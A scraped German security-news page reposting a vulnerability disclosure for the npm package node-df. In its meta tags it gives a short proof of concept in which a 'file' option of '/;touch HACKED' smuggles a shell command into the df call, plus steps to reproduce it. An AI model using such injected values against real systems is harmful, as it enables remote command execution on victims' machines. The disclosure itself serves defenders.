<!DOCTYPE html>
<html lang="de" prefix="og: http://ogp.me/ns#">
<head>
<title>Node.js third-party modules: [node-df] RCE via insecure command concatenation - Exploits News | Sicherheitslücken News - Reverse Engineering Informatik News</title>
<base href="https://tsecurity.de">
<link rel="canonical" href="https://tsecurity.de/de/938304/Reverse-Engineering/Exploits/Node.js-third-party-modules-node-df-RCE-via-insecure-command-concatenation/" />
<meta charset="utf-8">
<link rel="manifest" href="/manifest.json">
<meta http-equiv="expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="subject" content="Nachrichtenportal IT Sicherheit">
<meta name="distribution" content="Global">
<meta name="coverage" content="Worldwide">

<meta name="category" content="Nachrichtenportal">
<meta name="directory" content="submission">
<meta name="owner" content="Bludau Media">
<meta name="rating" content="general">
<meta name="web_author" content="Jan Bludau" />

<meta name="description" content="I would like to report a RCE issue in the node-df module. It allows to execute arbitrary commands remotely inside the victim&amp;#x27;s PC Module module name: node-df version: 0.1.4 npm page: https://www.npmjs.com/package/node-df Module Description  node-df (abbreviation of disk free) is a cross-platform Node.js wrapper around the standard Unix computer program, df.  Module Stats [N/A] downloads in the last day [3,023] downloads in the last week [N/A] downloads in the last month Vulnerability Description The issue occurs because a user input is concatenated inside a command that will be executed without any check. The issue arises here:  Steps To Reproduce:  Create the following PoC file:  ```js // poc.js var df = require(&amp;#x27;node-df&amp;#x27;); var options = {         file: &amp;#x27;/;touch HACKED&amp;#x27;,         prefixMultiplier: &amp;#x27;GB&amp;#x27;,         isDisplayPrefixMultiplier: true,         precision: 2     }; df(options, function (error, response) {     if (error) { throw error; } console.log(JSON.stringify(response, null, 2));  }); ``` 1. Execute the following commands in terminal: bash npm i node-df # Install affected module ls # Make sure there isn&amp;#x27;t any *HACKED* file node poc.js #  Run the PoC ls # The *HACKED* file has been created 1. The HACKED file will be created {F594172} Patch  Don&amp;#x27;t concatenate commands using insecure user&amp;#x27;s inputs :)  Supporting Material/References:  [OPERATING SYSTEM VERSION]: Kali Linux [NODEJS VERSION]: 10.16.3 [NPM VERSION]: 6.0.9  Wrap up  I contacted the maintainer to let them...">
<meta name="email" content="kontakt@tsecurity.de" />
<meta property="fb:page_id" content="640127549484944" />
<meta name="format-detection" content="telephone=yes">
<meta name="mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="application-name" content="Team Security">
<meta name="apple-mobile-web-app-title" content="tsecurity">
<meta name="theme-color" content="#2196f3">
<meta name="msapplication-navbutton-color" content="#2196f3">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="msapplication-starturl" content="/?pk_campaign=PWA&pk_kwd=startup">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="alternate" type="application/rss+xml" title="Team IT Security Nachrichtenportal" href="https://tsecurity.de/it-security-feed/Alle-Kategorien%7C1" />
<link rel="icon" type="image/png" sizes="192x192" href="/templates/tsecurity.de/media/logo-social-media.png">
<link rel="apple-touch-icon" type="image/png" sizes="192x192" href="/templates/tsecurity.de/media/logo-social-media.png">
<link rel="icon" type="image/png" sizes="512x512" href="/templates/tsecurity.de/media/logo-social-media.png">
<link rel="apple-touch-icon" type="image/png" sizes="512x512" href="/templates/tsecurity.de/media/logo-social-media.png">
<link rel="alternate" id="alternate-androidapp" href="android-app://com.companyname.Xamarin_TSecurity" />
<meta content="INDEX,FOLLOW" name="robots">
<meta name="msvalidate.01" content="AB583A6651F52B82FC00782C07C74C10" />

<meta name="copyright" content="Team Security">
<meta name="page-topic" content="Nachrichtenportal,IT-Sicherheit,IT-Security">
<meta name="revisit-after" content="7 days">
<meta property="og:locale" content="de_DE" />
<meta property="og:type" content="article" />
<meta property="og:site_name" content="Team IT Security" />
<meta property="og:title" content="Node.js third-party modules: [node-df] RCE via insecure command concatenation" />
<meta property="og:description" content="I would like to report a RCE issue in the node-df module. It allows to execute arbitrary commands remotely inside the victim&amp;#x27;s PC Module module name: node-df version: 0.1.4 npm page: https://www.npmjs.com/package/node-df Module Description  node-df (abbreviation of disk free) is a cross-platform Node.js wrapper around the standard Unix computer program, df.  Module Stats [N/A] downloads in the last day [3,023] downloads in the last week [N/A] downloads in the last month Vulnerability Description The issue occurs because a user input is concatenated inside a command that will be executed without any check. The issue arises here:  Steps To Reproduce:  Create the following PoC file:  ```js // poc.js var df = require(&amp;#x27;node-df&amp;#x27;); var options = {         file: &amp;#x27;/;touch HACKED&amp;#x27;,         prefixMultiplier: &amp;#x27;GB&amp;#x27;,         isDisplayPrefixMultiplier: true,         precision: 2     }; df(options, function (error, response) {     if (error) { throw error; } console.log(JSON.stringify(response, null, 2));  }); ``` 1. Execute the following commands in terminal: bash npm i node-df # Install affected module ls # Make sure there isn&amp;#x27;t any *HACKED* file node poc.js #  Run the PoC ls # The *HACKED* file has been created 1. The HACKED file will be created {F594172} Patch  Don&amp;#x27;t concatenate commands using insecure user&amp;#x27;s inputs :)  Supporting Material/References:  [OPERATING SYSTEM VERSION]: Kali Linux [NODEJS VERSION]: 10.16.3 [NPM VERSION]: 6.0.9  Wrap up  I contacted the maintainer to let them..." />
<meta name="coverage" content="Worldwide">
<meta property="og:url" content="https://tsecurity.de/de/938304/Reverse-Engineering/Exploits/Node.js-third-party-modules-node-df-RCE-via-insecure-command-concatenation/" />
<meta property="og:image" content="https://tsecurity.de/templates/tsecurity.de/media/logo-social-media.png" />
<meta property="og:image:width" content="200" />
<meta property="og:image:height" content="200" />

<meta name="twitter:creator" content="@thE_iNviNciblE0">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:site" content="@security_de" />
<meta name="twitter:title" content="Node.js third-party modules: [node-df] RCE via insecure command concatenation" />
<meta name="twitter:description" content="I would like to report a RCE issue in the node-df module. It allows to execute arbitrary commands remotely inside the victim&amp;#x27;s PC Module module name: node-df version: 0.1.4 npm page: https://www.npmjs.com/package/node-df Module Description  node-df (abbreviation of disk free) is a cross-platform Node.js wrapper around the standard Unix computer program, df.  Module Stats [N/A] downloads in the last day [3,023] downloads in the last week [N/A] downloads in the last month Vulnerability Description The issue occurs because a user input is concatenated inside a command that will be executed without any check. The issue arises here:  Steps To Reproduce:  Create the following PoC file:  ```js // poc.js var df = require(&amp;#x27;node-df&amp;#x27;); var options = {         file: &amp;#x27;/;touch HACKED&amp;#x27;,         prefixMultiplier: &amp;#x27;GB&amp;#x27;,         isDisplayPrefixMultiplier: true,         precision: 2     }; df(options, function (error, response) {     if (error) { throw error; } console.log(JSON.stringify(response, null, 2));  }); ``` 1. Execute the following commands in terminal: bash npm i node-df # Install affected module ls # Make sure there isn&amp;#x27;t any *HACKED* file node poc.js #  Run the PoC ls # The *HACKED* file has been created 1. The HACKED file will be created {F594172} Patch  Don&amp;#x27;t concatenate commands using insecure user&amp;#x27;s inputs :)  Supporting Material/References:  [OPERATING SYSTEM VERSION]: Kali Linux [NODEJS VERSION]: 10.16.3 [NPM VERSION]: 6.0.9  Wrap up  I contacted the maintainer to let them..." />
<meta name="twitter:image" content="https://tsecurity.de/templates/tsecurity.de/media/logo-social-media.png" />
<meta name="twitter:image:alt" content="Team IT Security Logo" />
<meta name="audience" content="alle">
<link rel="alternate" hreflang="de" href="https://tsecurity.de/de/938304/Reverse-Engineering/Exploits/Node.js-third-party-modules-node-df-RCE-via-insecure-command-concatenation/" />
<link rel="alternate" type="application/rss+xml" title="IT Security Feed News" href="https://tsecurity.de/it-security-feed/" />
<link rel="icon" type="image/png" sizes="32x32" href="/templates/tsecurity.de/media/tsecurity.ico">
<meta name="google-site-verification" content="vmdp2sS6_oJvt7FFOVJUcWIDaW1e3pwD1WZFm_jgPfg" />

<link rel="dns-prefetch" href="https://fonts.googleapis.com">
<link rel="dns-prefetch" href="https://cdnjs.cloudflare.com">
<link rel="dns-prefetch" src="http://www.youtube.com/">
<link rel="preconnect" src="http://www.youtube.com/">
<link rel="preconnect" href="https://cdnjs.cloudflare.com">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://translate.googleapis.com">
<link rel="preconnect" href="https://adservice.google.com">
<link rel="preload" href="/templates//tsecurity.de/css/template_master.css" as="style">

<link href="https://fonts.googleapis.com/css2?family=Trade+Winds&display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Oxanium:wght@700&family=Trade+Winds&display=swap" rel="stylesheet">
<script rel="preload" src="https://www.youtube.com/player_api"></script>
<script rel="preload" src="/js/jquery-3.4.0.min.js"></script>
<script rel="preload" src="/js/track.js"></script>
<script rel="preload" src="/framework/raty-2.7.0/lib/jquery.raty.js"></script>
<script>
// Smartphone Erkennung
function detectmob() { 
	 if( navigator.userAgent.match(/Android/i)
	 || navigator.userAgent.match(/webOS/i)
	 || navigator.userAgent.match(/iPhone/i)
	 || navigator.userAgent.match(/iPad/i)
	 || navigator.userAgent.match(/iPod/i)
	 || navigator.userAgent.match(/BlackBerry/i)
	 || navigator.userAgent.match(/Windows Phone/i)
	 ){
		return true;
	  }
	 else {
		return false;
	  }
	}	
</script>

<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TPNQ476');</script>

<link media="all" href="/templates/tsecurity.de/css/template_master.css" type="text/css" rel="stylesheet">
<link media="all" href="/templates/tsecurity.de/css/menu.css" type="text/css" rel="stylesheet">

<link rel="stylesheet" href="/templates/tsecurity.de/css/bootstrap/css/bootstrap.min.css">
<link rel="stylesheet" href="/framework/fontawesome/css/all.css">
<script src="/js/jquery-3.4.0.min.js"></script>

<script src="/templates/tsecurity.de/css/bootstrap/js/bootstrap.min.js"></script>
<script src="/js/track.js"></script>
<script src="https://www.youtube.com/player_api"></script>
<script src="/framework/raty-2.7.0/lib/jquery.raty.js"></script>
<script>
		$.fn.raty.defaults.path = '../../framework/raty-2.7.0/demo/images';
		
		var player;
		window.onYouTubePlayerAPIReadyByID = function(id) {
				player = new YT.Player('ytplayer_' + id, {
						height: '315',
					width: '560',
					videoId: id
				});
		}

	</script>

</head>
<body>

<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TPNQ476"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>

<div class="wrapper">
<div class="page">
<header class="header-container">
<div class="header">
<a title="Freie Welt Nachrichtenportal" href="/">
<img alt="logo" src="https://tsecurity.de//templates/tsecurity.de/media/tsecurity-logo2.png" />
</a>
</div>
</header>
<section>
<nav role="navigation" style="background-color: #1E1E23;height: 65px;">
<div id="menuToggle">
<input name="MenuToggle" id="togglemenu" type="checkbox" />
<span></span>
<span></span>
<span></span>
</div>
</nav>
<nav role="navigation" style="background-color: #1E1E23;">
<i class="fas fa-angle-right" style="font-size: 100px;position: fixed;top: 37.5%;left: 0%;z-index: 1000;"></i>
<ul id="menu" style="display:none;">
<li><a class="flex-nav-item" href="/de/2/Startseite/" target="_self" title="Team Security - Cyber Security News Portal">Startseite</a>
<ul>
<li><a class="flex-nav-item" href="/de/431830/Startseite/Android-Security/" target="_self" title="TOP Beitäge Android Security - Team Security - Cyber Security News Portal">Android Security</a></li>
<li><a class="flex-nav-item" href="/de/432639/Startseite/Pentesting/" target="_self" title="Pentesting - Team Security - Cyber Security News Portal">Pentesting</a></li>
<li><a class="flex-nav-item" href="/de/427974/Startseite/Malware/" target="_self" title="Malware - Team Security - Cyber Security News Portal">Malware</a></li>
<li><a class="flex-nav-item" href="/de/434563/Startseite/Programmieren/" target="_self" title="Programmieren - Team Security - Cyber Security News Portal">Programmieren</a></li>
</ul>
</li>
<li><a class="flex-nav-item" href="/de/18/Downloads/" target="_self" title="Downloads">Downloads</a></li>
<li><a class="flex-nav-item" href="/de/3/Nachrichten/" target="_self" title="IT-News / IT-Nachrichten">Nachrichten</a>
<ul>
<li><a class="flex-nav-item" href="/de/201468/Nachrichten/Videos/" target="_self" title="Videos - IT-News / IT-Nachrichten">Videos</a></li>
</ul>
</li>
<li><a class="flex-nav-item" href="/de/4/IT-Security/" target="_self" title="IT Security News / Cyber Security News">IT-Security</a>
<ul>
<li><a class="flex-nav-item" href="/de/5/IT-Security/Cyber-Security-Nachrichten/" target="_self" title="Cyber Security Nachrichten - IT Security News / Cyber Security News">Cyber Security Nachrichten</a></li>
<li><a class="flex-nav-item" href="/de/6/IT-Security/IT-Security-Tools/" target="_self" title="IT Security Tools News - IT Security News / Cyber Security News">IT Security Tools</a></li>
<li><a class="flex-nav-item" href="/de/7/IT-Security/IT-Security-Video/" target="_self" title="IT Security Video News - IT Security News / Cyber Security News">IT Security Video</a>
<ul>
<li><a class="flex-nav-item" href="/de/155807/IT-Security/IT-Security-Video/AI-Videos/" target="_self" title="AI Videos - IT Security Video News - IT Security News / Cyber Security News">AI Videos</a></li>
</ul>
</li>
<li><a class="flex-nav-item" href="/de/8/IT-Security/Hacking/" target="_self" title="Hacking News - IT Security News / Cyber Security News">Hacking</a></li>
<li><a class="flex-nav-item" href="/de/9/IT-Security/Malware-Trojaner-Viren/" target="_self" title="Malware News / Trojaner News / Viren News - IT Security News / Cyber Security News">Malware / Trojaner / Viren</a></li>
<li><a class="flex-nav-item" href="/de/245520/IT-Security/Programmierung/" target="_self" title="Programmierung - IT Security News / Cyber Security News">Programmierung</a>
<ul>
<li><a class="flex-nav-item" href="/de/424370/IT-Security/Programmierung/Video-Youtube/" target="_self" title="Video | Youtube - Programmierung - IT Security News / Cyber Security News">Video | Youtube</a></li>
</ul>
</li>
<li><a class="flex-nav-item" href="/de/424521/IT-Security/Podcasts/" target="_self" title="Podcasts - IT Security News / Cyber Security News">Podcasts</a></li>
</ul>
</li>
<li><a class="flex-nav-item" href="/de/10/Reverse-Engineering/" target="_self" title="Reverse Engineering Informatik News">Reverse Engineering</a>
<ul>
<li><a class="flex-nav-item" href="/de/11/Reverse-Engineering/Exploits/" target="_self" title="Exploits News | Sicherheitslücken News - Reverse Engineering Informatik News">Exploits</a>
<ul>
<li><a class="flex-nav-item" href="/de/12/Reverse-Engineering/Exploits/PoC/" target="_self" title="Proof of Concept Exploits Informatik (PoC) News - Exploits News | Sicherheitslücken News - Reverse Engineering Informatik News">PoC</a></li>
</ul>
</li>
<li><a class="flex-nav-item" href="/de/13/Reverse-Engineering/Video/" target="_self" title="Video News - Reverse Engineering Informatik News">Video</a></li>
<li><a class="flex-nav-item" href="/de/14/Reverse-Engineering/Tools/" target="_self" title="Tools News - Reverse Engineering Informatik News">Tools</a></li>
</ul>
</li>
<li><a class="flex-nav-item" href="/de/15/Betriebssysteme/" target="_self" title="Betriebssysteme Windows | Unix | Mac News">Betriebssysteme</a>
<ul>
<li><a class="flex-nav-item" href="/de/16/Betriebssysteme/Windows-Tipps/" target="_self" title="Windows Tipps News | Windows 10 uvm. - Betriebssysteme Windows | Unix | Mac News">Windows Tipps</a></li>
<li><a class="flex-nav-item" href="/de/155879/Betriebssysteme/Mac-OS-Tipps/" target="_self" title="Mac OS Tipps - Betriebssysteme Windows | Unix | Mac News">Mac OS Tipps</a></li>
<li><a class="flex-nav-item" href="/de/17/Betriebssysteme/Android-Tipps/" target="_self" title="Android Tipps News - Betriebssysteme Windows | Unix | Mac News">Android Tipps</a></li>
<li><a class="flex-nav-item" href="/de/155880/Betriebssysteme/Web-Tipps/" target="_self" title="Web Tipps - Betriebssysteme Windows | Unix | Mac News">Web Tipps</a></li>
<li><a class="flex-nav-item" href="/de/155878/Betriebssysteme/Linux-Tipps/" target="_self" title="Linux Tipps - Betriebssysteme Windows | Unix | Mac News">Linux Tipps</a></li>
</ul>
</li>
<li><a class="flex-nav-item" href="/de/19/Server/" target="_self" title="Server News | Windows Server News | Unix Server News">Server</a>
<ul>
<li><a class="flex-nav-item" href="/de/20/Server/Windows-Server/" target="_self" title="Windows Server News - Server News | Windows Server News | Unix Server News">Windows Server</a></li>
<li><a class="flex-nav-item" href="/de/21/Server/Unix-Server/" target="_self" title="Unix Server News - Server News | Windows Server News | Unix Server News">Unix Server</a></li>
</ul>
</li>
<li><a class="flex-nav-item" href="/de/111965/RSS-Feed-hinzuf%C3%BCgen/" target="_self" title="RSS Feed hinzufügen | IT Security">RSS Feed hinzufügen</a>
<ul>
<li><a class="flex-nav-item" href="/de/446968/RSS-Feed-hinzuf%C3%BCgen/Widerruf/" target="_self" title="Widerruf von Blogs - RSS Feed hinzufügen | IT Security">Widerruf</a></li>
<li><a class="flex-nav-item" href="/de/852168/RSS-Feed-hinzuf%C3%BCgen/Datenschutz/" target="_self" title="Datenschutz - RSS Feed hinzufügen | IT Security">Datenschutz</a></li>
</ul>
</li>
</ul>
</nav>
</div>
</section>
<div class="brotkruemmel">
<ol vocab="http://schema.org/" typeof="BreadcrumbList"><li property="itemListElement" typeof="ListItem"><a property="item" typeof="WebPage" href="/de/10/Reverse-Engineering/" title="Reverse Engineering"><span property="name">Reverse Engineering</span></a> > <meta property="position" content="3"></li><li property="itemListElement" typeof="ListItem"><a property="item" typeof="WebPage" href="/de/11/Reverse-Engineering/Exploits/" title="Exploits"><span property="name">Exploits</span></a> > <meta property="position" content="2"></li><li property="itemListElement" typeof="ListItem"><a property="item" typeof="WebPage" href="de/11/Reverse-Engineering/Exploits/"><span property="name">Node.js third-party modules: [node-df] RCE via insecure command concatenation</span></a><meta property="position" content="1"></li></ol>
<div id="google_translate_box">
<br />

<a href="#" onclick="doGTranslate('de|ar');return false;" title="Arabic" class="gflag nturl" style="background-position:-100px -0px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Arabic" /></a><a href="#" onclick="doGTranslate('de|en');return false;" title="English" class="gflag nturl" style="background-position:-0px -0px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="English" /></a><a href="#" onclick="doGTranslate('de|fr');return false;" title="French" class="gflag nturl" style="background-position:-200px -100px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="French" /></a><a href="#" onclick="doGTranslate('de|de');return false;" title="German" class="gflag nturl" style="background-position:-300px -100px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="German" /></a><a href="#" onclick="doGTranslate('de|el');return false;" title="Greek" class="gflag nturl" style="background-position:-400px -100px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Greek" /></a><a href="#" onclick="doGTranslate('de|it');return false;" title="Italian" class="gflag nturl" style="background-position:-600px -100px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Italian" /></a><a href="#" onclick="doGTranslate('de|ja');return false;" title="Japanese" class="gflag nturl" style="background-position:-700px -100px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Japanese" /></a><a href="#" onclick="doGTranslate('de|ko');return false;" title="Korean" class="gflag nturl" style="background-position:-0px -200px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Korean" /></a><a href="#" onclick="doGTranslate('de|fa');return false;" title="Persian" class="gflag nturl" style="background-position:-200px -500px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Persian" /></a><a href="#" onclick="doGTranslate('de|pl');return false;" title="Polish" class="gflag nturl" style="background-position:-200px -200px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Polish" /></a><a href="#" onclick="doGTranslate('de|pt');return false;" title="Portuguese" class="gflag nturl" style="background-position:-300px -200px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Portuguese" /></a><a href="#" onclick="doGTranslate('de|ru');return false;" title="Russian" class="gflag nturl" style="background-position:-500px -200px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Russian" /></a><a href="#" onclick="doGTranslate('de|es');return false;" title="Spanish" class="gflag nturl" style="background-position:-600px -200px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Spanish" /></a><a href="#" onclick="doGTranslate('de|tr');return false;" title="Turkish" class="gflag nturl" style="background-position:-100px -500px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Turkish" /></a><a href="#" onclick="doGTranslate('de|vi');return false;" title="Vietnamese" class="gflag nturl" style="background-position:-200px -400px;"><img src="//gtranslate.net/flags/blank.png" height="32" width="32" alt="Vietnamese" /></a>
<style type="text/css">
<!--

a.gflag {vertical-align:middle;font-size:32px;padding:1px 0;background-repeat:no-repeat;background-image:url(//gtranslate.net/flags/32.png);}
a.gflag img {border:0;}
a.gflag:hover {background-image:url(//gtranslate.net/flags/32a.png);}
#goog-gt-tt {display:none !important;}
.goog-te-banner-frame {display:none !important;}
.goog-te-menu-value:hover {text-decoration:none !important;}
body {top:0 !important;}
#google_translate_element2 {display:none!important;}
-->

</style>
<br /><select onchange="doGTranslate(this);"><option value="">Select Language</option><option value="de|af">Afrikaans</option><option value="de|sq">Albanian</option><option value="de|ar">Arabic</option><option value="de|hy">Armenian</option><option value="de|az">Azerbaijani</option><option value="de|eu">Basque</option><option value="de|be">Belarusian</option><option value="de|bg">Bulgarian</option><option value="de|ca">Catalan</option><option value="de|zh-CN">Chinese (Simplified)</option><option value="de|zh-TW">Chinese (Traditional)</option><option value="de|hr">Croatian</option><option value="de|cs">Czech</option><option value="de|da">Danish</option><option value="de|nl">Dutch</option><option value="de|en">English</option><option value="de|et">Estonian</option><option value="de|tl">Filipino</option><option value="de|fi">Finnish</option><option value="de|fr">French</option><option value="de|gl">Galician</option><option value="de|ka">Georgian</option><option value="de|de">German</option><option value="de|el">Greek</option><option value="de|ht">Haitian Creole</option><option value="de|iw">Hebrew</option><option value="de|hi">Hindi</option><option value="de|hu">Hungarian</option><option value="de|is">Icelandic</option><option value="de|id">Indonesian</option><option value="de|ga">Irish</option><option value="de|it">Italian</option><option value="de|ja">Japanese</option><option value="de|ko">Korean</option><option value="de|lv">Latvian</option><option value="de|lt">Lithuanian</option><option value="de|mk">Macedonian</option><option value="de|ms">Malay</option><option value="de|mt">Maltese</option><option value="de|no">Norwegian</option><option value="de|fa">Persian</option><option value="de|pl">Polish</option><option value="de|pt">Portuguese</option><option value="de|ro">Romanian</option><option value="de|ru">Russian</option><option value="de|sr">Serbian</option><option value="de|sk">Slovak</option><option value="de|sl">Slovenian</option><option value="de|es">Spanish</option><option value="de|sw">Swahili</option><option value="de|sv">Swedish</option><option value="de|th">Thai</option><option value="de|tr">Turkish</option><option value="de|uk">Ukrainian</option><option value="de|ur">Urdu</option><option value="de|vi">Vietnamese</option><option value="de|cy">Welsh</option><option value="de|yi">Yiddish</option></select><div id="google_translate_element2"></div>
<script type="text/javascript">

function googleTranslateElementInit2() {new google.translate.TranslateElement({pageLanguage: 'de',autoDisplay: false}, 'google_translate_element2');}

</script><script async type="text/javascript" src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2"></script>
<script type="text/javascript">

/* <![CDATA[ */
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('6 7(a,b){n{4(2.9){3 c=2.9("o");c.p(b,f,f);a.q(c)}g{3 c=2.r();a.s(\'t\'+b,c)}}u(e){}}6 h(a){4(a.8)a=a.8;4(a==\'\')v;3 b=a.w(\'|\')[1];3 c;3 d=2.x(\'y\');z(3 i=0;i<d.5;i++)4(d[i].A==\'B-C-D\')c=d[i];4(2.j(\'k\')==E||2.j(\'k\').l.5==0||c.5==0||c.l.5==0){F(6(){h(a)},G)}g{c.8=b;7(c,\'m\');7(c,\'m\')}}',43,43,'||document|var|if|length|function|GTranslateFireEvent|value|createEvent||||||true|else|doGTranslate||getElementById|google_translate_element2|innerHTML|change|try|HTMLEvents|initEvent|dispatchEvent|createEventObject|fireEvent|on|catch|return|split|getElementsByTagName|select|for|className|goog|te|combo|null|setTimeout|500'.split('|'),0,{}))
/* ]]> */

</script> </div>
</div>
<div style="clear:both"></div>
<div class="main col2-right-layout">
<div id="main_page_container" class="main-border">
<div class="container-fluid">
<div class="row"><main class="col-sm-8"><article class="block rss_content_view" id="box_rss_content_view_936570"><div class="block-title"> <h1><i class="fas fa-atom"></i> </h1></div><article class="content rss_content_view" id="modul_rss_content_view_936570"><hr class="rss_category"><header></header><hr class="rss_category">...<br /><br /><h3><a title="" href=""><i class="fas fa-external-link-alt"></i> Externe Webseite mit kompletten Inhalt &ouml;ffnen</a></h3>
<br /><br /></article><div class="block-title"><h2>Team Security Social Media</h2></div>
<article class="content rss_content_view">
<div class="social-media">
<h3>Teilen...</h3>
<a href="https://www.reddit.com/submit?url=https://tsecurity.de/de///&title=" class="btn-social btn-reddit" title="reddit share" target="_blank" rel="noopener"><i class="fab fa-reddit-square"></i> Auf Reddit teilen</a><br />
<a href="https://twitter.com/intent/tweet?text=&amp;url=https://tsecurity.de/de///" class="btn-social btn-twitter" title="Twitter share" target="_blank" rel="noopener"><i class="fab fa-twitter-square"></i> Auf Twitter teilen</a><br />
<a href="https://api.whatsapp.com/send?text= https://tsecurity.de/de///" class="btn-social btn-whatsapp" title="Whatsapp share" target="_blank" rel="noopener"><i class="fab fa-whatsapp-square"></i> Auf Whatsapp teilen</a><br />
<a href="https://telegram.me/share/url?url=https://tsecurity.de/de///&bodytext=&text=" class="btn-social btn-whatsapp" title="Telegram share" target="_blank" rel="noopener"><i class="fab fa-telegram-square"></i> Auf Telegram teilen</a><br />
<a href="https://facebook.com/sharer.php?u=https://tsecurity.de/de///" class="btn-social btn-facebook" title="Facebook" target="_blank" rel="noopener"><i class="fab  fa-facebook-square"></i> Auf Facebook teilen</a><br />
<br />
<h3>Folgen...</h3>
<a href="https://twitter.com/teamsecurity3" class="btn-social btn-twitter" title="Twitter" target="_blank" rel="noopener"><i class="fab  fa-twitter-square"></i> Team Security Twitter Kanal - alle 5 Minuten News tweets</a><br />
<a href="https://www.facebook.com/tsec0/" class="btn-social btn-facebook" title="Facebook" target="_blank" rel="noopener"><i class="fab  fa-facebook-square"></i> Team Security Facebook Seite mit ausgewählten Nachrichten</a><br />
<a href="https://www.reddit.com/r/Computersicherheit/" class="btn-social btn-reddit" title="Reddit Kanal" target="_blank" rel="noopener"><i class="fab  fa-reddit-square"></i> Team Security Reddit Seite mit ausgewählten Nachrichten</a><br />
<br><br>
<a title="Team Securit IT Sicherheit Nachrichtenportal Startseite" href="https://tsecurity.de/"><i class="fa fa-home" aria-hidden="true"></i> Zur Startseite von Team Security</a>
</div>
</article></article></article><article class="block similar" id="box_similar_936291"><div class="block-title"> <h1>➤ Weitere Beiträge von Team Security | IT Sicherheit</h1></div><div class="content similar" id="modul_similar_936291"><div class="row"><ul class="rss_feed_similar"></ul></div></div></article><article class="block kommentar" id="box_kommentar_936307"><div class="block-title"> <h1>Team Security Diskussion über Node.js third-party modules: [node-df] RCE via insecure command concatenation</h1></div><div class="content" id="modul_kommentar_936307"><form action="#" onsubmit="return setKommentar('setKommentar','kommentar','936307','0');" id="setKommentar" name="frmKommentar"><br /><input type="text" id="txtEmail" name="txtEmail" placeholder="Bitte Email eingeben..."><br /><input type="text" id="txtTitle" name="txtTitle" placeholder="Bitte Titel eingeben..."> <br /><br />
<textarea id="txtKommentar" name="txtKommentar" placeholder="Diskutieren Sie über die Team Security News..." rows="4" cols="50"></textarea><br />
<input type="hidden" id="txtMenue" name="txtMenue" value="938304"><input type="submit" name="btnSenden" value="An Diskussion teilnehmen" class="button"></form></div></article></main><aside class="col-sm-4"><article class="block stats" id="box_stats_1651083"><div class="block-title"> <h3><i class="fas fa-adjust"></i> </h3></div><div class="content" id="modul_stats_1651083"><ul class="modul_menue_normal"><script>
	$(document).ready(function() {	 	
		load_stats_popular('stats','1651083','');
	});
</script></ul></div></article><article class="block stats" id="box_stats_1651084"><div class="block-title"> <h3><i class="fas fa-adjust"></i> </h3></div><div class="content" id="modul_stats_1651084"><ul class="modul_menue_normal"><script>
	$(document).ready(function() {	 	
		load_stats_popular('stats','1651084','');
	});
</script></ul></div></article></aside></div>
</div>
</div>
</div>
<div style="clear:both"></div>
<footer>
<div class="footer">
<div style="float:left;width:32%;margin-right:30px">
<h2>Social Media Informationsportal Team IT Security</h2>
<ul>
<li><a rel="noopener" title="Team IT Security auf Twitter folgen" href="https://twitter.com/teamsecurity3">Team IT Security Nachrichtenportal auf <u>Twitter</u> folgen</a> [<font color="red">NEU</font>]</li>
<li><a rel="noopener" title="Team IT Security auf Facebook folgen" href="https://www.facebook.com/tsec0/">Team IT Security Nachrichtenportal auf <u>Facebook</u> folgen</a></li>
<li><a rel="noopener" title="Team IT Security auf Github folgen" href="https://github.com/thE-iNviNciblE">Team IT Security Nachrichtenportal auf <u>Github</u> folgen</a></li>
</ul><br />
Email: <a href="/cdn-cgi/l/email-protection#c0a9aea6af80b4b3a5a3b5b2a9b4b9eea4a5"><span class="__cf_email__" data-cfemail="5a33343c351a2e293f392f28332e23743e3f">[email&#160;protected]</span></a> schreiben (24 / 7)<br />
</div>
<div style="float:left;width:32%">
<h2>&Uuml;ber Informationsportal Team IT Security</h2>
<ul>
<li><a title="Ãœber IT Security Team" href="/de/3612/Ueber-TSEC/">Team IT Security Nachrichtenportal <u>Sitemap</u></a></li>
<li><a title="Impressum IT Security Team" href="/de/2657/Impressum/">Team IT Security Nachrichtenportal <u>Impressum</u></a></li>
